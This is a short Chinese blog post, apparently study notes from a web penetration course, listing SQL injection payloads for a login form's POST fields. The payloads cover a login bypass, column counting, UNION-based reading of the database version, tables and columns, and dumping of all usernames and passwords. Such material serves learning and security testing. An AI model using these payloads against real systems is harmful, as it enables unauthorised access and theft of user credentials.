web渗透—— SQL基于GET POST注入

0x00 前言

之前我们学习了这些知识。

这里写图片描述

0x01 小知识

1.万能登录

1' or 1=1 #

2. 判断字段数

uname=123' order by 2 # &passwd=&submit=Submit

3. 联合查询

uname=123' union select  1,2 # &passwd=&submit=Submit

4.查询数据库具体信息

uname=123' union select  version(),database() # &passwd=&submit=Submit

这里写图片描述

5. 查询当前数据库的所有表

uname=123' union select 1, group_concat(table_name)from information_schema.tables where table_schema=database() # &passwd=&submit=Submit

6.查看表中的字段名

uname=123' union select 1, group_concat(column_name)from information_schema.columns where table_name='users' # &passwd=&submit=Submit

7.输出所有的用户名和密码

uname=123' union select group_concat(username), group_concat(password) from users# &passwd=&submit=Submit
阅读更多
版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/qq_36869808/article/details/79965880
上一篇web渗透—— SQL基于时间的盲注
下一篇Java笔记——this
想对作者说点什么? 我来说一句

没有更多推荐了,返回首页

关闭
关闭